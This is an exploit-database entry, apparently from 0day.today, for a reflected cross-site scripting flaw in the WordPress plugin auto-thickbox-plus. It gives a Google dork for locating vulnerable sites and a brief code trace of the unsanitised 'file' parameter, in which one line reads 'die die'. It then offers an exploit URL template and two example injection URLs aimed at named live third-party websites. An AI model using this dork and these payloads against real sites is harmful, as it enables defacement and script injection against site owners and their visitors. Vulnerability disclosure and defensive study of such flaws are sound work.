id: 24609
date: 11/25/2015
title: Wordpress auto-thickbox-plus  plugin XSS Vulnerability
author: sniper.t
cves: 

######################################################################
# Exploit Title: Wordpress plugin auto-thickbox-plus  XSS Vulnerability
# Vendor or Software Link: https://wordpress.org/plugins/auto-thickbox-plus/
# Google dork: inurl:/wp-content/plugins/auto-thickbox-plus
######################################################################
 
 The code in ./auto-thickbox-plus/download.min.php
 

    2: die die ('Error: Unsupported file type. $ext=' . $b); 
        2: $b = strtolower(pathinfo($a, PATHINFO_EXTENSION)); 
            2: $a = sanitize_url($a); 
                2: 
                ⇓ function force_download($a)


	

    2: ⇑ force_download (str_replace(chr(0), '', $_GET['file'])); 
 
 
 
Exploit Code
http://server/wp-content/plugins/auto-thickbox-plus/download.min.php?file=/*XSS_HERE*/


example

http://www.adstrategies.com/wp-content/plugins/auto-thickbox-plus/download.min.php?file=%3Ch1%3E%20sniper.T.ksa%3C/h1%3E
http://www.traveltabai.com/wp-content/plugins/auto-thickbox-plus/download.min.php?file=%3Ch1%3E%20sniper.T.ksa%3C/h1%3E

#  0day.today [2023-03-25]  #